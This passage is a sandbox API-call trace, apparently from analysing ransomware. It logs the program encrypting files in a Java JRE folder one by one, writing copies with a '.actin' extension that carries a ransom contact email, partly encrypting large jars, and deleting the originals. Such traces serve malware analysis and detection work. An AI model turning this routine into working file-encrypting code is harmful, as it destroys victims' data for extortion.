[0153.775] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2e70) returned 1 [0153.775] CryptSetKeyParam (hKey=0xac2e70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.775] ReadFile (in: hFile=0x2e0, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x218e, lpOverlapped=0x0) returned 1 [0153.778] CryptEncrypt (in: hKey=0xac2e70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x2190, dwBufLen=0x2190 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x2190) returned 1 [0153.778] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x2190, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x2190, lpOverlapped=0x0) returned 1 [0153.779] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2eb0) returned 1 [0153.779] CryptSetKeyParam (hKey=0xac2eb0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.779] CryptEncrypt (in: hKey=0xac2eb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0153.779] CryptDestroyKey (hKey=0xac2eb0) returned 1 [0153.779] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0153.779] CryptDestroyKey (hKey=0xac2e70) returned 1 [0153.779] CloseHandle (hObject=0x2e0) returned 1 [0153.779] CloseHandle (hObject=0x2ec) returned 1 [0153.779] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash.gif")) returned 1 [0153.780] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.781] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0153.781] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=15276) returned 1 [0153.781] CloseHandle (hObject=0x2ec) returned 1 [0153.781] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif")) returned 0x20 [0153.781] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.781] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0153.782] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.782] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.782] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0153.782] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3170) returned 1 [0153.782] CryptSetKeyParam (hKey=0xac3170, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.782] ReadFile (in: hFile=0x2ec, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x3bac, lpOverlapped=0x0) returned 1 [0153.784] CryptEncrypt (in: hKey=0xac3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x3bb0, dwBufLen=0x3bb0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x3bb0) returned 1 [0153.784] WriteFile (in: hFile=0x2e0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x3bb0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x3bb0, lpOverlapped=0x0) returned 1 [0153.785] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac33f0) returned 1 [0153.785] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.785] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0153.785] CryptDestroyKey (hKey=0xac33f0) returned 1 [0153.785] WriteFile (in: hFile=0x2e0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0153.785] CryptDestroyKey (hKey=0xac3170) returned 1 [0153.785] CloseHandle (hObject=0x2ec) returned 1 [0153.785] CloseHandle (hObject=0x2e0) returned 1 [0153.785] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash@2x.gif")) returned 1 [0153.786] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.786] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0153.787] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=7805) returned 1 [0153.787] CloseHandle (hObject=0x2e0) returned 1 [0153.787] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif")) returned 0x20 [0153.787] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.787] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0153.787] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.787] SetFilePointerEx (in: hFile=0x2e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.787] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0153.787] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3030) returned 1 [0153.787] CryptSetKeyParam (hKey=0xac3030, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.787] ReadFile (in: hFile=0x2e0, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x1e7d, lpOverlapped=0x0) returned 1 [0153.789] CryptEncrypt (in: hKey=0xac3030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x1e80, dwBufLen=0x1e80 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x1e80) returned 1 [0153.789] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x1e80, lpOverlapped=0x0) returned 1 [0153.790] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3230) returned 1 [0153.790] CryptSetKeyParam (hKey=0xac3230, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.790] CryptEncrypt (in: hKey=0xac3230, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x50, dwBufLen=0x50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x50) returned 1 [0153.790] CryptDestroyKey (hKey=0xac3230) returned 1 [0153.790] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x102, lpOverlapped=0x0) returned 1 [0153.790] CryptDestroyKey (hKey=0xac3030) returned 1 [0153.790] CloseHandle (hObject=0x2e0) returned 1 [0153.790] CloseHandle (hObject=0x2ec) returned 1 [0153.790] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif")) returned 1 [0153.791] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.791] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0153.792] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=12250) returned 1 [0153.792] CloseHandle (hObject=0x2ec) returned 1 [0153.792] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif")) returned 0x20 [0153.792] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0153.792] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0153.792] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.792] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0153.792] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0153.792] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2ef0) returned 1 [0153.792] CryptSetKeyParam (hKey=0xac2ef0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.792] ReadFile (in: hFile=0x2ec, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x2fda, lpOverlapped=0x0) returned 1 [0153.794] CryptEncrypt (in: hKey=0xac2ef0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x2fe0, dwBufLen=0x2fe0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x2fe0) returned 1 [0153.794] WriteFile (in: hFile=0x2e0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x2fe0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x2fe0, lpOverlapped=0x0) returned 1 [0153.795] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac33f0) returned 1 [0153.795] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.795] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x50, dwBufLen=0x50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x50) returned 1 [0153.795] CryptDestroyKey (hKey=0xac33f0) returned 1 [0153.795] WriteFile (in: hFile=0x2e0, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x102, lpOverlapped=0x0) returned 1 [0153.795] CryptDestroyKey (hKey=0xac2ef0) returned 1 [0153.796] CloseHandle (hObject=0x2ec) returned 1 [0153.796] CloseHandle (hObject=0x2e0) returned 1 [0153.796] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif")) returned 1 [0153.797] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0153.797] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0153.925] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=5040094) returned 1 [0153.938] CloseHandle (hObject=0x2f4) returned 1 [0153.959] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar")) returned 0x20 [0153.959] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar"), lpNewFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0153.959] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0153.959] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0153.959] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0153.959] ReadFile (in: hFile=0x2f4, lpBuffer=0x3675058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32af91c, lpOverlapped=0x0 | out: lpBuffer=0x3675058*, lpNumberOfBytesRead=0x32af91c*=0x40000, lpOverlapped=0x0) returned 1 [0153.970] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x19a29f, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0153.970] ReadFile (in: hFile=0x2f4, lpBuffer=0x36b5058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32af91c, lpOverlapped=0x0 | out: lpBuffer=0x36b5058*, lpNumberOfBytesRead=0x32af91c*=0x40000, lpOverlapped=0x0) returned 1 [0153.976] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x48e7de, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0153.976] ReadFile (in: hFile=0x2f4, lpBuffer=0x36f5058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32af91c, lpOverlapped=0x0 | out: lpBuffer=0x36f5058*, lpNumberOfBytesRead=0x32af91c*=0x40000, lpOverlapped=0x0) returned 1 [0153.984] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af900, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af96c | out: phKey=0x32af96c*=0xac2db0) returned 1 [0153.984] CryptSetKeyParam (hKey=0xac2db0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0153.985] CryptEncrypt (in: hKey=0xac2db0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af920*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3675020*, pdwDataLen=0x32af920*=0xc0050) returned 1 [0153.986] CryptDestroyKey (hKey=0xac2db0) returned 1 [0153.986] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af948 | out: lpNewFilePointer=0x0) returned 1 [0153.986] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x32af958, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af958*=0xc0102, lpOverlapped=0x0) returned 1 [0154.148] SetEndOfFile (hFile=0x2f4) returned 1 [0154.148] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x48e7de, lpNewFilePointer=0x0, dwMoveMethod=0x32af918 | out: lpNewFilePointer=0x0) returned 1 [0154.148] WriteFile (in: hFile=0x2f4, lpBuffer=0x373513a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32af924, lpOverlapped=0x0 | out: lpBuffer=0x373513a*, lpNumberOfBytesWritten=0x32af924*=0x40000, lpOverlapped=0x0) returned 1 [0154.150] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x19a29f, lpNewFilePointer=0x0, dwMoveMethod=0x32af918 | out: lpNewFilePointer=0x0) returned 1 [0154.151] WriteFile (in: hFile=0x2f4, lpBuffer=0x373513a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32af924, lpOverlapped=0x0 | out: lpBuffer=0x373513a*, lpNumberOfBytesWritten=0x32af924*=0x40000, lpOverlapped=0x0) returned 1 [0154.152] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af918 | out: lpNewFilePointer=0x0) returned 1 [0154.153] WriteFile (in: hFile=0x2f4, lpBuffer=0x373513a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32af924, lpOverlapped=0x0 | out: lpBuffer=0x373513a*, lpNumberOfBytesWritten=0x32af924*=0x40000, lpOverlapped=0x0) returned 1 [0154.154] CloseHandle (hObject=0x2f4) returned 1 [0154.156] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0154.156] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jaccess.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0154.158] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=44516) returned 1 [0154.158] CloseHandle (hObject=0x2f4) returned 1 [0154.158] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jaccess.jar")) returned 0x20 [0154.158] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jaccess.jar.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0154.159] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jaccess.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0154.159] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0154.159] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0154.159] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jaccess.jar.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0154.159] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3170) returned 1 [0154.159] CryptSetKeyParam (hKey=0xac3170, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0154.159] ReadFile (in: hFile=0x2f4, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0xade4, lpOverlapped=0x0) returned 1 [0154.162] CryptEncrypt (in: hKey=0xac3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0xadf0, dwBufLen=0xadf0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0xadf0) returned 1 [0154.162] WriteFile (in: hFile=0x2e4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xadf0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xadf0, lpOverlapped=0x0) returned 1 [0154.163] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2e70) returned 1 [0154.163] CryptSetKeyParam (hKey=0xac2e70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0154.163] CryptEncrypt (in: hKey=0xac2e70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0154.164] CryptDestroyKey (hKey=0xac2e70) returned 1 [0154.164] WriteFile (in: hFile=0x2e4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0154.164] CryptDestroyKey (hKey=0xac3170) returned 1 [0154.164] CloseHandle (hObject=0x2f4) returned 1 [0154.164] CloseHandle (hObject=0x2e4) returned 1 [0154.164] DeleteFileW (lpFileName="\\\\?\\C:\\Program 